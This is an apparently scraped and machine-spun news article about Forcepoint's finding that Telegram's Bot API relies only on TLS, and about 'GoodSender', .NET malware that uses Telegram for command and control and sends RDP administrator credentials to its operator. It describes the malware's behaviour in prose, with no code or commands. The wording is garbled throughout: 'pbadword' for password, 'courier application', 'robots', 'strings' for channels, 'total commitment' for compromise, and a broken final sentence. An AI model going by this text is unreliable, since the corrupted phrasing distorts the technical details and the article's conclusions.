[ad_1]
Alert is the Forcepoint cybersecurity company. The company recommended to all users to avoid using robots on the platform due to a failure
Many users are using the courier application Telegram as an apparently more private alternative than their competitors WhatsApp and ] Facebook Messenger . The messenger has been positioned as an encrypted communication application for those who are more concerned with surveillance and censorship. However, a new investigation by Forcepoint, a cybersecurity firm, has revealed a serious vulnerability in the security and confidentiality of the tool. According to this discovery, the application would have been used as command and control infrastructure (C2) for the launch of malware . In post published on the company's blog, security researcher Abel Toro, explained how cyber criminals could take advantage of the API Telegram Bot API to communicate with malware .
Telegram robots are programs that can be integrated into discussions by messaging or on public channels and that can execute and automate specific functions. Examples include custom keyboards, memes on demand, or even payment transactions. The bot model is supported by the Telegram since 2015 and is popular because it is convenient and fun. However, what Forcepoint discovered while investigating the bot's API is that the feature does not incorporate the encryption algorithm used by Telegram to protect discussions. Thus, by adding a bot to a chat or channel, the platform becomes less secure and makes it easier for an attacker to intercept messages.
"Because of the bot's API operation, all bot's past messages can be read by an opponent who can intercept and decrypt HTTPS traffic. The opponent has the complete history of all the messages sent or received by the destination bot.This often includes messages between regular users, because the robots often share a discussion group with them, Toro explained.
The Telegram uses internally generated MTProto encryption in TLS traffic to protect messages between regular users. According to the company, only TLS is not secure enough for an encrypted email application. However, Toro says that this does not apply to programs that use the Telegram Bot API and that messages sent in this way are only protected by the HTTPS layer. "To make matters worse, any adversary capable of conveying important information in each message can not only access the messages in transit, but also retrieve the full history of the messages from the destination bot."
According to Forcepoint, the malware in question is quite simple, created in .NET, with the operator called "GoodSender" and using Telegram as C2. Once the malware is installed, it creates a new administrator user and activates the remote desktop, ensuring that the feature is not blocked by the firewall. The user name of the new administrator is static, but the pbadword is randomly generated. All this information (username, pbadword and IP address of the victim) are sent to the operator via the Telegram network, allowing him to access the victim's computer via the RDP protocol.
"Although Telegram is advertised as a secure messaging application and uses an encryption scheme with higher guarantees than TLS (at least in theory) during regular discussions, the robots use traditional TLS to encrypt data in transit, "warned Toro. As a result, an attacker could access the bot token as well as chat_id, thus causing the total commitment not only of the current communication, but of all previous communications.
to all users to avoid the use of Telegram robots, as well as strings and groups with a bot.
[ad_2]
Source link
